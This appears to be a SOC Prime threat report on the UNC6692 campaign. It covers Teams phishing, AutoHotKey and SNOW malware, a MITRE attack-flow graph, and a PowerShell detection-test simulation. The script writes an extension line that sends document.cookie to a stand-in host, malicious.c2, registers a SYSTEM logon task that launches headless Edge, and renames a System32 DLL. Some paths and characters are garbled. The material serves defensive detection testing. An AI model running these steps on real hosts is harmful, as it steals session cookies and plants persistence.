UNC6692 Deploys Custom Malware Through Social Engineering

SOC Prime Team

UNC6692 Deploys Custom Malware Through Social Engineering

Detection stack

AIDR
Alert
ETL
Query

Threat Report
Attack Flow
Detections
Simulations

Summary

UNC6692 carried out a multi-stage intrusion that started with a phishing link sent through Microsoft Teams, delivered a malicious AutoHotKey payload, and deployed a custom modular malware toolkit known as SNOW, including SNOWBELT, SNOWGLAZE, and SNOWBASIN. The operation also used a rogue Chromium browser extension, a Python-based tunneling utility, and a local HTTP backdoor to enable lateral movement, credential theft, and data exfiltration through cloud services. The campaign stood out for its effective abuse of legitimate cloud infrastructure and browser-based persistence mechanisms. Detecting this activity requires close monitoring of unusual browser extension behavior, scheduled tasks that launch Edge in headless mode, and suspicious access to cloud storage services.

Investigation

Google Threat Intelligence Group uncovered the campaign through analysis of Teams chat records, captured AutoHotKey scripts, scheduled task configurations, and network traffic involving AWS S3 and a Heroku-hosted WebSocket server. Malware analysis exposed the SNOW malware family, its internal components, communication patterns, and the attackers’ use of PsExec together with credential-dumping tools. Investigators also confirmed the theft of LSASS memory and Active Directory database files, which were exfiltrated through LimeWire.

Mitigation

Defenders should apply strict allow-listing policies for browser extensions, monitor for Microsoft Edge launched with headless or extension-related flags, and block access to unapproved AWS S3 buckets and Heroku domains. Enforcing multi-factor authentication for privileged accounts and watching for PsExec execution and LSASS access can help limit credential theft and lateral movement. Scheduled tasks and startup shortcuts should also be reviewed regularly to identify unauthorized persistence.

Response

If any SNOW component is detected, isolate the affected system immediately, terminate suspicious Edge and AutoHotKey processes, and collect memory for LSASS-related forensic analysis. Block the known command-and-control domains and IP addresses, remove malicious browser extensions, and rotate credentials for privileged accounts. A full network-wide sweep should then be performed to identify additional compromised hosts, along with a review of scheduled tasks and startup items for persistence.

"graph TB %% Class definitions classDef technique fill:#99ccff classDef tool fill:#cccccc classDef malware fill:#ffcc99 classDef operator fill:#ff9900 %% Technique nodes tech_phishing["Technique – T1566.002 Phishing: Spearphishing Link via Microsoft Teams Description: Adversary delivers a malicious link through Microsoft Teams to target users."] class tech_phishing technique tech_user_exec["Technique – T1204.001 User Execution: Click malicious link Description: Victim clicks the malicious link, triggering execution."] class tech_user_exec technique tech_ahk["Technique – T1059.010 Command and Scripting Interpreter: AutoHotkey/AutoIT Description: Executes AutoHotkey binary and script to run further code."] class tech_ahk technique tech_python["Technique – T1059.006 Command and Scripting Interpreter: Python Description: Runs Python loaders for additional modules."] class tech_python technique tech_ext["Technique – T1176 Software Extensions: Install Chromium Extension Description: Installs a malicious browser extension to maintain persistence."] class tech_ext technique tech_schedtask["Technique – T1053.005 Scheduled Task: Launch Headless Edge Description: Creates scheduled tasks to start Edge with the malicious extension."] class tech_schedtask technique tech_shortcut["Technique – T1547.009 Shortcut Modification Description: Places a shortcut in the Startup folder for automatic execution."] class tech_shortcut technique tech_ingress["Technique – T1105 Ingress Tool Transfer Description: Downloads additional payloads such as SNOWGLAZE and SNOWBASIN."] class tech_ingress technique tech_obfuscate["Technique – T1027 Obfuscated Files or Information Description: Encodes payloads with Base64 and encrypts with AESu2011GCM."] class tech_obfuscate technique tech_archive["Technique – T1560 Archive Collected Data Description: Encrypts and stages data before exfiltration."] class tech_archive technique tech_encchannel["Technique – T1573.001 Encrypted Channel: Symmetric Cryptography Description: Uses AESu2011GCM for encrypted communications."] class tech_encchannel technique tech_tunnel["Technique – T1572 Protocol Tunneling Description: Establishes a WebSocket tunnel to a Heroku commandu2011andu2011control server."] class tech_tunnel technique tech_appproto["Technique – T1071.001 Application Layer Protocol: WebSocket Description: Communicates with C2 over WebSocket applicationu2011layer protocol."] class tech_appproto technique tech_proxy["Technique – T1090 Proxy Description: Utilizes the tunnel as a proxy to route traffic."] class tech_proxy technique tech_psexec["Technique – T1021.002 SMB/Windows Admin Shares: PsExec Description: Executes remote processes via SMB admin shares for lateral movement."] class tech_psexec technique tech_cred_dump["Technique – T1003 OS Credential Dumping Description: Extracts credentials from LSASS memory."] class tech_cred_dump technique tech_pass_hash["Technique – T1550.002 Pass the Hash Description: Uses captured NTLM hashes to authenticate to other systems."] class tech_pass_hash technique tech_rdp["Technique – T1021.001 Remote Desktop Protocol Description: Connects via RDP to backup server and domain controller."] class tech_rdp technique tech_exfil["Technique – T1567.002 Exfiltration to Cloud Storage Description: Uploads harvested AD database files to Amazon S3."] class tech_exfil technique %% Tool nodes tool_ahk_binary["Tool – Name: AutoHotkey binary Description: Executes compiled AHK scripts."] class tool_ahk_binary tool tool_python_runtime["Tool – Name: Python interpreter Description: Runs Python-based loaders."] class tool_python_runtime tool tool_edge_headless["Tool – Name: Microsoft Edge (headless) Description: Browser used to execute malicious extension."] class tool_edge_headless tool tool_snowglaze["Tool – Name: SNOWGLAZE loader Description: Downloads and launches additional modules."] class tool_snowglaze tool tool_snowbasin["Tool – Name: SNOWBASIN loader Description: Secondary loader used after SNOWGLAZE."] class tool_snowbasin tool tool_snowbelt_ext["Tool – Name: SNOWBELT Chromium extension Description: Provides persistence and data collection in the browser."] class tool_snowbelt_ext tool tool_psexec["Tool – Name: PsExec Description: Executes processes on remote Windows hosts via admin shares."] class tool_psexec tool %% Malware nodes malware_snowglaze["Malware – Name: SNOWGLAZE Description: Loader that creates WebSocket tunnel and encrypts traffic."] class malware_snowglaze malware malware_snowbasin["Malware – Name: SNOWBASIN Description: Secondary payload that assists in data staging."] class malware_snowbasin malware malware_snowbelt["Malware – Name: SNOWBELT extension Description: Chromium extension used for persistence and exfiltration."] class malware_snowbelt malware %% Attack flow connections tech_phishing –>|leads_to| tech_user_exec tech_user_exec –>|triggers| tech_ahk tech_ahk –>|uses| tool_ahk_binary tech_ahk –>|executes| tech_python tech_python –>|uses| tool_python_runtime tech_python –>|downloads| tool_snowglaze tech_python –>|downloads| tool_snowbasin tool_snowglaze –>|installs| malware_snowglaze tool_snowbasin –>|installs| malware_snowbasin malware_snowglaze –>|creates| tech_ext tech_ext –>|installs| tool_snowbelt_ext tool_snowbelt_ext –>|installs| malware_snowbelt tech_ext –>|enables| tech_schedtask tech_schedtask –>|launches| tool_edge_headless tech_ext –>|enables| tech_shortcut tech_shortcut –>|adds| op_shortcut_startup(("Startup shortcut")) class op_shortcut_startup operator tech_user_exec –>|downloads| tech_ingress tech_ingress –>|delivers| tech_obfuscate tech_obfuscate –>|prepares| tech_archive tech_archive –>|protects| tech_encchannel tech_encchannel –>|protects| tech_tunnel tech_tunnel –>|uses| tech_appproto tech_tunnel –>|acts_as| tech_proxy tech_proxy –>|routes| tech_psexec tech_psexec –>|uses| tool_psexec tool_psexec –>|executes| tech_cred_dump tech_cred_dump –>|provides| tech_pass_hash tech_pass_hash –>|enables| tech_rdp tech_rdp –>|connects_to| tech_exfil "

Attack Flow

Attack Narrative & Commands:
1. Goal: Establish persistent, stealthy execution of the Snowbelt browser‑based payload on the victim host.
2. Method: Register a scheduled task that launches Microsoft Edge in headless mode with the malicious Snowbelt extension (C:TempSnowbelt). The extension loads malicious JavaScript that contacts C2 and exfiltrates data.
3. Cleanup Indicator: After the payload runs, the attacker removes CoreUIComponents.dll from the system DLL cache to evade detection of a “healthy” Edge process; the edge process continues running but the module is absent, satisfying the second clause of the rule.

Regression Test Script:

# UNC6692 Simulation – creates malicious scheduled task and runs Edge without CoreUIComponents.dll
# -------------------------------------------------------------------------
# 1️⃣ Define variables
$edgePath   = "$Env:ProgramFiles(x86)MicrosoftEdgeApplicationmsedge.exe"
$extPath    = "C:TempSnowbelt"
$taskName   = "SnowbeltEdgeTask"
$arguments  = "--headless --load-extension=`"$extPath`""
$taskUser   = "SYSTEM"

# 2️⃣ Ensure extension folder exists (simulated payload)
New-Item -ItemType Directory -Force -Path $extPath | Out-Null
Set-Content -Path "$extPathmanifest.json" -Value '{"name":"Snowbelt","version":"1.0","manifest_version":2,"background":{"scripts":["snow.js"]}}' -Encoding UTF8
Set-Content -Path "$extPathsnow.js" -Value 'fetch("http://malicious.c2/collect", {method:"POST", body:document.cookie});' -Encoding UTF8

# 3️⃣ Register the malicious scheduled task
$action  = New-ScheduledTaskAction -Execute $edgePath -Argument $arguments
$trigger = New-ScheduledTaskTrigger -AtLogOn
Register-ScheduledTask -TaskName $taskName -Action $action -Trigger $trigger -User $taskUser -Force

# 4️⃣ Start the task immediately to generate telemetry
Start-ScheduledTask -TaskName $taskName

# 5️⃣ Remove CoreUIComponents.dll from the running Edge process (simulated)
#    Note: In a real environment this would involve DLL hijacking or process memory patching.
#    Here we simply delete the file to cause the tasklist check to miss it.
$dllPath = "$Env:SystemRootSystem32CoreUIComponents.dll"
if (Test-Path $dllPath) {
    Rename-Item -Path $dllPath -NewName "CoreUIComponents.dll.bak" -Force
}

# 6️⃣ Verify that Edge is running and the DLL is absent
$proc = Get-Process -Name "msedge" -ErrorAction SilentlyContinue
if ($proc) {
    Write-Host "Edge process PID $($proc.Id) launched with malicious extension."
}

Cleanup Commands:

# Remove scheduled task
Unregister-ScheduledTask -TaskName "SnowbeltEdgeTask" -Confirm:$false

# Restore CoreUIComponents.dll if it was renamed
$dllPath = "$Env:SystemRootSystem32CoreUIComponents.dll"
$backup   = "$Env:SystemRootSystem32CoreUIComponents.dll.bak"
if (Test-Path $backup) {
    Rename-Item -Path $backup -NewName "CoreUIComponents.dll" -Force
}

# Delete simulated extension files
Remove-Item -Path "C:TempSnowbelt" -Recurse -Force

Join SOC Prime's Detection as Code platform to improve visibility into threats most relevant to your business. To help you get started and drive immediate value, book a meeting now with SOC Prime experts.

Join for Free